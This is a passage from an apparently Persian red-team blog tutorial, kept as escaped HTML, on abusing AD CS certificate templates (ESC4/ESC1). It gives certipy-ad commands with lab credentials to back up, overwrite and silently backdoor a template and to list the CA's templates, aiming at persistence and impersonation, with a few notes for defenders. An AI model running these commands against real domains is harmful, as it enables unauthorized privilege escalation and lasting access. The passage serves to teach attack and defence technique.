(\u062a\u0647\u062f\u06cc\u062f\u0627\u062a \u067e\u0627\u06cc\u062f\u0627\u0631 \u067e\u06cc\u0634\u0631\u0641\u062a\u0647) \u0645\u062d\u0633\u0648\u0628 \u0645\u06cc\u200c\u0634\u0648\u062f \u06a9\u0647 \u0628\u0627\u06cc\u062f \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u0642\u0631\u0645\u0632 (Red Team) \u0648 \u062a\u062d\u0644\u06cc\u0644 \u0627\u0645\u0646\u06cc\u062a\u06cc \u067e\u06cc\u0634\u0631\u0641\u062a\u0647 \u0645\u0648\u0631\u062f \u0628\u0631\u0631\u0633\u06cc \u0642\u0631\u0627\u0631 \u06af\u06cc\u0631\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19894\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16-300x154.png\" alt=\"\" width=\"532\" height=\"273\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16-300x154.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16-1024x527.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16-768x395.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16-150x77.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/16.png 1103w\" sizes=\"(max-width: 532px) 100vw, 532px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0648\u06cc\u0631\u0627\u06cc\u0634 \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0648 \u06a9\u0646\u062a\u0631\u0644<\/strong><strong> CA (Modifying Templates &amp; CA)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u067e\u0633 \u0627\u0632 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u0648\u0641\u0642 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0648\u0627\u0647\u06cc (Certificate-Based Access)\u060c \u0645\u0631\u062d\u0644\u0647\u200c\u06cc \u0628\u0639\u062f\u06cc \u062d\u0645\u0644\u0647 \u0634\u0627\u0645\u0644 \u062a\u0633\u0644\u0637 \u06a9\u0627\u0645\u0644 \u0628\u0631 \u0632\u06cc\u0631\u0633\u0627\u062e\u062a \u0645\u0631\u062c\u0639 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (Certificate Authority) \u0627\u0633\u062a. \u062f\u0631 \u0627\u06cc\u0646 \u0645\u0631\u062d\u0644\u0647:<\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0645\u0627\u0646\u0646\u062f ESC4 \u0631\u0627 \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631 \u0645\u06cc\u200c\u062f\u0647\u06cc\u0645\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062e\u0648\u062f \u0631\u0627 \u0628\u0647 \u0639\u0646\u0648\u0627\u0646 Certificate Officer \u0627\u0636\u0627\u0641\u0647 \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06a9\u0646\u062a\u0631\u0644 \u06a9\u0627\u0645\u0644 \u0631\u0648\u06cc \u0641\u0631\u0622\u06cc\u0646\u062f \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u060c \u062b\u0628\u062a\u060c \u0648 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0631\u062e\u0648\u0627\u0633\u062a\u200c\u0647\u0627 \u0628\u0647\u200c\u062f\u0633\u062a \u0645\u06cc\u200c\u0622\u0648\u0631\u06cc\u0645\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0648 \u062f\u0631 \u0646\u0647\u0627\u06cc\u062a\u060c \u0633\u0637\u062d \u062d\u0645\u0644\u0647 \u0631\u0627 \u0628\u0647\u200c\u06af\u0648\u0646\u0647\u200c\u0627\u06cc \u0645\u062f\u06cc\u0631\u06cc\u062a \u0648 \u062e\u0648\u062f\u06a9\u0627\u0631\u0633\u0627\u0632\u06cc \u0645\u06cc\u200c\u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0645\u062f\u0627\u0648\u0645 \u0648 \u0645\u0627\u0646\u062f\u06af\u0627\u0631 (Persistence) \u0627\u06cc\u062c\u0627\u062f \u0634\u0648\u062f.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc \u0627\u0632 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u06af\u0648\u0627\u0647\u06cc<\/strong><strong> (Backup a Template Configuration)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 ESC4 \u0631\u0627 \u062f\u0631 \u0642\u0627\u0644\u0628 \u0641\u0627\u06cc\u0644 JSON \u0630\u062e\u06cc\u0631\u0647 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -save-configuration backup.json<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u06a9\u0627\u0631\u0628\u0631\u062f \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0641\u0627\u06cc\u0644 JSON \u0634\u0627\u0645\u0644 \u062a\u0645\u0627\u0645 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u062c\u0627\u0631\u06cc \u0642\u0627\u0644\u0628 \u0627\u0633\u062a: \u0645\u0627\u0646\u0646\u062f EKU\u060c \u0645\u062c\u0648\u0632\u0647\u0627\u060c \u0633\u06cc\u0627\u0633\u062a\u200c\u0647\u0627\u06cc \u062b\u0628\u062a (Enrollment)\u060c \u0648 &#8230;<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0645\u06cc\u200c\u062a\u0648\u0627\u0646 \u0627\u0632 \u0622\u0646 \u0628\u0631\u0627\u06cc \u0628\u0627\u0632\u06cc\u0627\u0628\u06cc \u0646\u0633\u062e\u0647\u200c\u06cc \u0633\u0627\u0644\u0645 \u0642\u0627\u0644\u0628 \u062f\u0631 \u0635\u0648\u0631\u062a \u0646\u06cc\u0627\u0632 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0631\u062f\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06cc\u0627 \u0622\u0646 \u0631\u0627 \u0628\u0647\u200c\u0639\u0646\u0648\u0627\u0646 \u067e\u0627\u06cc\u0647\u200c\u0627\u06cc \u0628\u0631\u0627\u06cc \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u0645\u062e\u0631\u0628 \u062f\u0631 \u0622\u06cc\u0646\u062f\u0647 \u0646\u06af\u0647 \u062f\u0627\u0634\u062a.<\/span><\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0632\u0645\u0627\u0646\u06cc \u06a9\u0627\u0631\u0628\u0631\u062f\u06cc \u0627\u0633\u062a \u06a9\u0647 \u0645\u0647\u0627\u062c\u0645 \u06cc\u0627 \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0642\u0635\u062f \u062f\u0627\u0631\u062f \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u067e\u0646\u0647\u0627\u0646\u06cc \u0631\u0627 \u0628\u0631 \u0631\u0648\u06cc \u0642\u0627\u0644\u0628\u200c\u0647\u0627 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0646\u062f \u0648\u0644\u06cc \u0628\u062a\u0648\u0627\u0646\u062f \u062f\u0631 \u0647\u0631 \u0632\u0645\u0627\u0646 \u0622\u0646\u200c\u0647\u0627 \u0631\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u0627\u0648\u0644\u06cc\u0647 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0647\u0645\u0686\u0646\u06cc\u0646 \u062a\u06cc\u0645\u200c\u0647\u0627\u06cc \u0622\u0628\u06cc (Blue Team) \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0628\u0627 \u0645\u0627\u0646\u06cc\u062a\u0648\u0631\u06cc\u0646\u06af \u0641\u0627\u06cc\u0644\u200c\u0647\u0627\u06cc \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u06cc\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a JSON \u062f\u0631 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u060c \u0628\u0647 \u0634\u0646\u0627\u0633\u0627\u06cc\u06cc \u0631\u0641\u062a\u0627\u0631\u0647\u0627\u06cc \u0645\u0634\u06a9\u0648\u06a9 \u0628\u067e\u0631\u062f\u0627\u0632\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u062f\u0631 \u0628\u062e\u0634\u200c\u0647\u0627\u06cc \u0628\u0639\u062f\u06cc \u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u06cc\u0645 \u0642\u0627\u0644\u0628 \u0631\u0627 \u0627\u0635\u0644\u0627\u062d (modify) \u06cc\u0627 \u0628\u0627\u0631\u06af\u0630\u0627\u0631\u06cc \u0645\u062c\u062f\u062f (restore) \u06a9\u0646\u06cc\u0645 \u062a\u0627 \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062e\u0648\u062f \u0631\u0627 \u0627\u0639\u0645\u0627\u0644 \u06a9\u0631\u062f\u0647 \u06cc\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u0642\u0628\u0644 \u0628\u0631\u06af\u0631\u062f\u0627\u0646\u06cc\u0645.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19895\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17-300x35.png\" alt=\"\" width=\"506\" height=\"59\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17-300x35.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17-1024x121.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17-768x91.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17-150x18.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/17.png 1407w\" sizes=\"(max-width: 506px) 100vw, 506px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636<\/strong><strong> (Overwrite with Default Configuration)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u06af\u0648\u0627\u0647\u06cc ESC4 \u0631\u0627 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 (Default Configuration) \u062c\u0627\u06cc\u06af\u0632\u06cc\u0646 \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -write-default-configuration<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u06a9\u0627\u0631\u0628\u0631\u062f \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><\/p>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a \u0642\u0627\u0644\u0628 \u0633\u062e\u062a\u200c\u0633\u0627\u0632\u06cc\u200c\u0634\u062f\u0647 (Hardened Template) \u0631\u0627 \u0628\u0647 \u062d\u0627\u0644\u062a \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0648\u06cc\u0646\u062f\u0648\u0632 \u0628\u0627\u0632\u0645\u06cc\u200c\u06af\u0631\u062f\u0627\u0646\u062f.<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u062f\u0631 \u0628\u0633\u06cc\u0627\u0631\u06cc \u0627\u0632 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647\u060c \u0627\u06cc\u0646 \u0628\u0647 \u0645\u0639\u0646\u0627\u06cc \u062d\u0630\u0641 \u0645\u062d\u062f\u0648\u062f\u06cc\u062a\u200c\u0647\u0627 \u0648 \u0628\u0627\u0632\u06af\u0631\u062f\u0627\u0646\u062f\u0646 \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc\u06cc \u0645\u0627\u0646\u0646\u062f:<\/span>\n<ul>\n<li><span style=\"font-size: 10pt\">\u0627\u0645\u06a9\u0627\u0646 \u062a\u0646\u0638\u06cc\u0645 SAN (Subject Alternative Name) \u062a\u0648\u0633\u0637 \u06a9\u0627\u0631\u0628\u0631 \u062b\u0628\u062a\u200c\u0646\u0627\u0645\u200c\u06a9\u0646\u0646\u062f\u0647 (Enrollee-supplied SAN)\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u0641\u0639\u0627\u0644\u200c\u0633\u0627\u0632\u06cc \u062e\u0648\u062f\u06a9\u0627\u0631 \u06af\u0648\u0627\u0647\u06cc \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062a\u0623\u06cc\u06cc\u062f \u062f\u0633\u062a\u06cc\u060c<\/span><\/li>\n<li><span style=\"font-size: 10pt\">\u06cc\u0627 \u062f\u0633\u062a\u0631\u0633\u06cc \u06a9\u0627\u0631\u0628\u0631\u0627\u0646 \u0633\u0637\u062d \u067e\u0627\u06cc\u06cc\u0646 \u0628\u0647 \u0642\u0627\u0644\u0628.<\/span><\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647 \u0627\u0645\u0646\u06cc\u062a\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u062f\u0631 \u0633\u0648\u0621\u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0633\u0628\u06a9 ESC4\u060c \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0642\u0627\u0644\u0628 \u0628\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u067e\u06cc\u0634\u200c\u0641\u0631\u0636 \u0628\u0647 \u0645\u0647\u0627\u062c\u0645 \u0627\u06cc\u0646 \u0627\u0645\u06a9\u0627\u0646 \u0631\u0627 \u0645\u06cc\u200c\u062f\u0647\u062f \u06a9\u0647 \u0645\u062c\u062f\u062f\u0627\u064b \u0627\u0632 \u0647\u0645\u0627\u0646 \u0642\u0627\u0644\u0628 \u0628\u0631\u0627\u06cc \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc\u200c\u0647\u0627\u06cc \u062a\u0642\u0644\u0628\u06cc \u06cc\u0627 \u062c\u0639\u0644 \u0647\u0648\u06cc\u062a \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u06a9\u0646\u062f.<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062a\u06a9\u0646\u06cc\u06a9 \u0647\u0645\u0686\u0646\u06cc\u0646 \u062f\u0631 \u062a\u0633\u062a \u0646\u0641\u0648\u0630 \u0648 \u0639\u0645\u0644\u06cc\u0627\u062a \u062a\u06cc\u0645 \u0642\u0631\u0645\u0632 \u0628\u0631\u0627\u06cc \u0628\u0627\u0632 \u06a9\u0631\u062f\u0646 \u0645\u0633\u06cc\u0631 \u0648\u0631\u0648\u062f \u0645\u062c\u062f\u062f (re-entry point) \u0628\u0633\u06cc\u0627\u0631 \u062d\u06cc\u0627\u062a\u06cc \u0627\u0633\u062a.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19896\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18-300x113.png\" alt=\"\" width=\"544\" height=\"205\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18-300x113.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18-1024x386.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18-768x290.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18-150x57.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/18.png 1387w\" sizes=\"(max-width: 544px) 100vw, 544px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0628\u06cc\u0627\u06cc\u06cc\u062f \u0646\u06af\u0627\u0647\u06cc \u0633\u0631\u06cc\u0639 \u062f\u0627\u0634\u062a\u0647 \u0628\u0627\u0634\u06cc\u0645 \u0628\u0647 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0635\u0627\u062f\u0631\u0634\u062f\u0647 \u062a\u0648\u0633\u0637 \u0645\u0631\u062c\u0639 \u0635\u062f\u0648\u0631 \u06af\u0648\u0627\u0647\u06cc (Certificate Authority &#8211; CA) \u0648 \u0627\u06cc\u0646\u06a9\u0647 \u0686\u06af\u0648\u0646\u0647 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc\u200c\u0647\u0627\u06cc \u0646\u0627\u062f\u0631\u0633\u062a\u2014\u0645\u0627\u0646\u0646\u062f \u0645\u0648\u0627\u0631\u062f \u0645\u0634\u0627\u0647\u062f\u0647\u200c\u0634\u062f\u0647 \u062f\u0631 \u062a\u06a9\u0646\u06cc\u06a9\u200c\u0647\u0627\u06cc ESC1 \u0648 ESC4\u2014\u0645\u06cc\u200c\u062a\u0648\u0627\u0646\u0646\u062f \u0645\u0646\u062c\u0631 \u0628\u0647 \u0627\u06cc\u062c\u0627\u062f \u0645\u0633\u06cc\u0631\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u0648 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc \u0634\u0648\u0646\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19897\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/19-300x245.png\" alt=\"\" width=\"549\" height=\"448\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/19-300x245.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/19-768x628.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/19-150x123.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/19.png 933w\" sizes=\"(max-width: 549px) 100vw, 549px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0627\u0639\u0645\u0627\u0644 \u06cc\u06a9 \u0642\u0627\u0644\u0628 \u062a\u063a\u06cc\u06cc\u0631\u06cc\u0627\u0641\u062a\u0647 \u06cc\u0627 \u062f\u0627\u0631\u0627\u06cc \u0628\u06a9\u200c\u062f\u064f\u0631<\/strong><strong> (Backdoored Template)<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0642\u0627\u0644\u0628 (template) \u0645\u0648\u0631\u062f \u0646\u0638\u0631 \u0631\u0627 \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0627\u06cc\u0644 JSON \u0630\u062e\u06cc\u0631\u0647\u200c\u0634\u062f\u0647 \u0627\u0632 \u0642\u0628\u0644 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0641\u0644\u06af -no-save \u0628\u0627\u0639\u062b \u0645\u06cc\u200c\u0634\u0648\u062f \u0627\u06cc\u0646 \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u0628\u0647\u200c\u0635\u0648\u0631\u062a \u0628\u06cc\u200c\u0635\u062f\u0627 (silent) \u0627\u0646\u062c\u0627\u0645 \u0634\u062f\u0647 \u0648 \u0646\u0633\u062e\u0647 \u0641\u0639\u0644\u06cc \u0642\u0627\u0644\u0628 \u0645\u062c\u062f\u062f\u0627\u064b \u067e\u0634\u062a\u06cc\u0628\u0627\u0646\u200c\u06af\u06cc\u0631\u06cc (backup) \u0646\u0634\u0648\u062f.<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad template -u raj -p Password@1 -dc-ip 192.168.1.20 -template ESC4 -write-configuration backup.json -no-save<\/span><\/pre>\n<p><span style=\"font-size: 10pt\"><strong>\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc<\/strong><strong>:<\/strong><\/span><br \/>\n<span style=\"font-size: 10pt\">\u062f\u0631 \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u0627\u0628\u0632\u0627\u0631 certipy-ad \u0628\u0631\u0627\u06cc \u0628\u0627\u0632\u0646\u0648\u06cc\u0633\u06cc \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 Active Directory Certificate Services (AD CS) \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0628\u0627 \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u06af\u0632\u06cc\u0646\u0647 -write-configuration \u0647\u0645\u0631\u0627\u0647 \u0628\u0627 \u0641\u0627\u06cc\u0644 backup.json\u060c \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0627\u0632 \u067e\u06cc\u0634 \u0630\u062e\u06cc\u0631\u0647\u200c\u0634\u062f\u0647 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0648\u06cc \u0642\u0627\u0644\u0628 \u0645\u0634\u062e\u0635\u200c\u0634\u062f\u0647 \u0628\u0627 -template ESC4 \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u0634\u0648\u062f. \u0627\u0633\u062a\u0641\u0627\u062f\u0647 \u0627\u0632 \u0641\u0644\u06af -no-save \u0627\u0632 \u0627\u06cc\u062c\u0627\u062f \u0646\u0633\u062e\u0647 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u062c\u062f\u06cc\u062f \u062c\u0644\u0648\u06af\u06cc\u0631\u06cc \u0645\u06cc\u200c\u06a9\u0646\u062f \u062a\u0627 \u0639\u0645\u0644\u06cc\u0627\u062a \u0628\u062f\u0648\u0646 \u062b\u0628\u062a \u062a\u063a\u06cc\u06cc\u0631\u0627\u062a \u062c\u062f\u06cc\u062f \u062f\u0631 \u0641\u0627\u06cc\u0644 \u067e\u0634\u062a\u06cc\u0628\u0627\u0646 \u0627\u0646\u062c\u0627\u0645 \u06af\u06cc\u0631\u062f\u2014\u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0645\u0639\u0645\u0648\u0644\u0627\u064b \u062f\u0631 \u0633\u0646\u0627\u0631\u06cc\u0648\u0647\u0627\u06cc \u062d\u0645\u0644\u0647 \u06cc\u0627 \u067e\u06cc\u06a9\u0631\u0628\u0646\u062f\u06cc \u0645\u062e\u0641\u06cc\u0627\u0646\u0647 \u0627\u0646\u062c\u0627\u0645 \u0645\u06cc\u200c\u0634\u0648\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-19898\" src=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-300x124.png\" alt=\"\" width=\"530\" height=\"219\" srcset=\"https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-300x124.png 300w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-1024x423.png 1024w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-768x317.png 768w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-1536x634.png 1536w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20-150x62.png 150w, https:\/\/liangroup.net\/blog\/wp-content\/uploads\/2025\/07\/20.png 1546w\" sizes=\"(max-width: 530px) 100vw, 530px\" \/><\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0646\u06a9\u062a\u0647<\/strong><strong>:<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u0639\u0645\u0644\u06cc\u0627\u062a\u060c \u062a\u0646\u0638\u06cc\u0645\u0627\u062a \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631 \u0634\u0646\u0627\u062e\u062a\u0647\u200c\u0634\u062f\u0647 \u0631\u0627 \u0645\u062c\u062f\u062f\u0627\u064b \u0631\u0648\u06cc \u06cc\u06a9 \u0642\u0627\u0644\u0628 (template) \u0627\u0639\u0645\u0627\u0644 \u0645\u06cc\u200c\u06a9\u0646\u062f. \u0627\u06cc\u0646 \u06a9\u0627\u0631 \u0627\u0645\u06a9\u0627\u0646 \u0628\u0647\u0631\u0647\u200c\u0628\u0631\u062f\u0627\u0631\u06cc\u200c\u0647\u0627\u06cc \u0622\u062a\u06cc \u0645\u0628\u062a\u0646\u06cc \u0628\u0631 \u06af\u0648\u0627\u0647\u06cc \u062f\u06cc\u062c\u06cc\u062a\u0627\u0644 (certificate-based exploits) \u0645\u0627\u0646\u0646\u062f \u0622\u0633\u06cc\u0628\u200c\u067e\u0630\u06cc\u0631\u06cc\u200c\u0647\u0627\u06cc ESC1 \u06cc\u0627 ESC4 \u0631\u0627 \u0628\u062f\u0648\u0646 \u0646\u06cc\u0627\u0632 \u0628\u0647 \u062f\u0633\u062a\u0631\u0633\u06cc \u0627\u062f\u0645\u06cc\u0646 CA (Certificate Authority) \u0641\u0631\u0627\u0647\u0645 \u0645\u06cc\u200c\u0633\u0627\u0632\u062f.<\/span><\/p>\n<p><span style=\"font-size: 10pt\"><strong>\u0634\u0645\u0627\u0631\u0634<\/strong><strong> (Enumeration) <\/strong><strong>\u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0645\u0648\u062c\u0648\u062f \u062f\u0631<\/strong><strong> CA<\/strong><\/span><\/p>\n<p><span style=\"font-size: 10pt\">\u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631\u060c \u062a\u0645\u0627\u0645 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc\u06cc \u0631\u0627 \u06a9\u0647 \u062f\u0631 \u062d\u0627\u0644 \u062d\u0627\u0636\u0631 \u062a\u0648\u0633\u0637 CA (Certificate Authority) \u0645\u0646\u062a\u0634\u0631 \u0634\u062f\u0647\u200c\u0627\u0646\u062f\u060c \u0641\u0647\u0631\u0633\u062a \u0645\u06cc\u200c\u06a9\u0646\u062f:<\/span><\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\"><span style=\"font-size: 10pt\">certipy-ad ca -u sanjeet -p Password@12 -dc-ip 192.168.1.20 -target 192.168.1.20 -list-template -ca ignite-DC01-CA<\/span><\/pre>\n<p><span style=\"font-size: 10pt\">\u062a\u0648\u0636\u06cc\u062d \u0641\u0646\u06cc:<\/span><br \/>\n<span style=\"font-size: 10pt\">\u0627\u062c\u0631\u0627\u06cc \u0627\u06cc\u0646 \u062f\u0633\u062a\u0648\u0631 \u0628\u0647 \u0645\u0627 \u0627\u062c\u0627\u0632\u0647 \u0645\u06cc\u200c\u062f\u0647\u062f \u0628\u0631\u0631\u0633\u06cc \u06a9\u0646\u06cc\u0645 \u06a9\u0647 \u0622\u06cc\u0627 \u0642\u0627\u0644\u0628\u200c\u0647\u0627\u06cc \u0647\u062f\u0641 \u0645\u0627\u0646\u0646\u062f 